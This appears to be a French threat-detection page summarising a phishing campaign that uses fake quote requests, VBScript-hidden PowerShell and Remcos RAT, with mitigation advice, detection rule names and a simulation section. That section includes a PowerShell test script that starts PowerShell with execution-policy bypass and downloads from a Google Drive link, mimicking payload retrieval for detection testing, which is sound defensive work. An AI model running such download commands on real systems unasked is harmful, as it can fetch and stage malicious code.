Faux Demandes de Devis Utilisées dans des Attaques de Phishing par Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Des acteurs de la menace distribuent des e-mails de phishing déguisés en demandes de devis de projet pour livrer des charges utiles malveillantes. La campagne utilise VBScript pour dissimuler des commandes PowerShell, qui récupèrent finalement une charge utile à plusieurs étapes et Remcos RAT. Le logiciel malveillant final prend en charge l’exécution de commandes à distance, la journalisation des frappes, et l’exfiltration de données des systèmes compromis.
Enquête
AhnLab Security Intelligence Center (ASEC) a identifié une campagne de phishing dans laquelle des archives compressées contiennent des VBScripts cachés. Les chercheurs ont découvert une méthode d’obfuscation qui abuse de notepad.exe pour reconstruire le nom exécutable ‘powershell’ et repose sur une substitution de chaîne basée sur des jetons pour les commandes PowerShell. La charge utile à plusieurs étapes utilise également des objets COM pour effectuer un contournement UAC.
Atténuation
Les utilisateurs doivent valider le domaine de l’expéditeur et rester prudents lors de l’ouverture de pièces jointes ou d’hyperliens inattendus. Les organisations doivent configurer le filtrage des e-mails pour bloquer les extensions de fichiers suspectes telles que .vbs, .exe et .js. Les utilisateurs doivent également éviter de saisir des identifiants sensibles sur des URL non officielles ou suspectes reçues par e-mails non sollicités.
Réponse
Lorsqu’une activité malveillante est détectée, vérifiez la légitimité de l’e-mail d’origine et examinez l’activité de fichiers suspects dans %APPDATA%. Vérifiez l’exécution non autorisée de PowerShell et les indicateurs associés à Remcos RAT. Isolez les systèmes compromis du réseau pour empêcher toute communication C2 supplémentaire, activité latérale et exfiltration de données potentielle.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
LOLBAS WScript / CScript (via process_creation)
Possible infiltration/exfiltration de données / C2 via des services/outils tiers (via dns_query)
Possible infiltration/exfiltration de données / C2 via des services/outils tiers (via dns)
IOC (HashMd5) pour détecter : Phishing / Escroquerie par malware : Méfiez-vous des e-mails de phishing déguisés en demandes de devis
IOC (SourceIP) pour détecter : Phishing / Escroquerie par malware : Méfiez-vous des e-mails de phishing déguisés en demandes de devis
IOC (DestinationIP) pour détecter : Phishing / Escroquerie par malware : Méfiez-vous des e-mails de phishing déguisés en demandes de devis
Détecter script PowerShell se connectant au serveur C2 [connexion réseau Windows]
Exécution de PowerShell malveillant via obfuscation VBScript [Windows PowerShell]
Exécution de simulation
-
Narrative & Commandes de l’attaque : Un attaquant envoie un e-mail de spearphishing contenant un lien vers un document. Lorsque l’utilisateur clique sur le lien, il exécute une commande PowerShell cachée conçue pour extraire un script malveillant d’un dépôt Google Drive. L’attaquant utilise le
export=downloadparamètre pour s’assurer que le fichier est téléchargé directement plutôt que visualisé dans un navigateur. L’objectif est d’exécuter une charge utile sans fichier en mémoire pour échapper à l’antivirus basé sur disque. La commande est construite pour déclencher la règle de détection spécifique ciblant ce modèle de téléchargement. -
Script de test de régression :
# Simulation de téléchargement de fichier PowerShell à partir de Google Drive via un modèle d'URL spécifique $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J" Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Téléchargement de la charge utile...'; $data = Invoke-WebRequest -Uri '$targetUrl';`"" -
Commandes de nettoyage :
# Aucun fichier n'est écrit sur le disque dans cette simulation spécifique, # mais nous arrêtons le processus s'il est toujours en cours d'exécution. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue